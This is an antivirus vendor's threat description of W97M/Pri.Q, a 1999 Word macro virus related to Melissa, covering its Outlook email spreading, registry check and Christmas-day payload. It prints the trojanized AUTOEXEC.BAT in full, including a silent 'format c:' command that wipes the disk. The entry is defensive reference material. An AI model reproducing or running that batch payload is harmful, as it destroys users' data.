Lumension® Endpoint Intelligence Center

Intelligence Center » Browse All Threats » W97M/Pri.Q

Overview

Threat Risk LOW LOW
Destructivity MEDIUM MEDIUM
Payload
Detection files published 23 Nov 1999 03:00:00
Description created 23 Nov 1999 03:00:00
Description updated 23 Nov 1999 03:00:00
Malware type VIRUS
Alias W97M/Melissa.X
W97M/Melissa.AG
W97M/Prilissa.A.
Spreading mechanism EMAIL
FILE_INFECTION
Summary None

W97M/Pri.Q

Spreading

The W97M/Pri.Q virus will start to disable certain settings. If the virus detects that Office2000 is in use, it will disable the Macro|Security menu item, otherwise, it assumes Office97 and will disable the Tools|Macro menu item.

If the Registry key

 
HKEY_CURRENT_USER\Software\Microsoft\Office\CyberNETdoes not equal "(C)1999 - Indonesia by AnomOke!" the virus will e-mail the infected document using Microsoft Outlook to the first 50 entries in the address book.

When the messages are sent, W97M/Pri.Q will set the above-mentioned key in the registry, preventing the virus to send out another series of infected documents.

After the e-mail session, W97M/Pri.Q will check if the date is 25 December of any year to drop its payload. Next the virus will call its polymorphic routine changing the appearance making detection for conventional scanners difficult.

Payload Details

Every 25 December W97M/Pri.Q will deliver its payload. First it will overwrite the AUTOEXEC.BAT in the Root-directory on drive C: with this content:

 
@echo off@echo Vine...Vide...Vice...Moslem Power Never End...
@echo Your Computer Have Just Been Terminated By -= CyberNET =- Virus!!!
ctty nul
format c: /autotest /q /uThe next time the system is rebooted, the hard disk will be formatted and all the information will be wiped.

After dropping the trojanized AUTOEXEC.BAT file, the virus will display this Message Box on the screen:

 
Vine...Vide...Vice...Moslem Power Never End...Yo
p Dare Rise Against Me... The Human Era is Over. The CyberNET Era Has Come !!!This is then followed by a series of different shapes moving on the screen.

Analysis

n/a

Removal

The batch file dropped by the virus will be identified as BAT/Pri.Q.Trojan.


Last Updated: 12 Nov 2015 11:06:10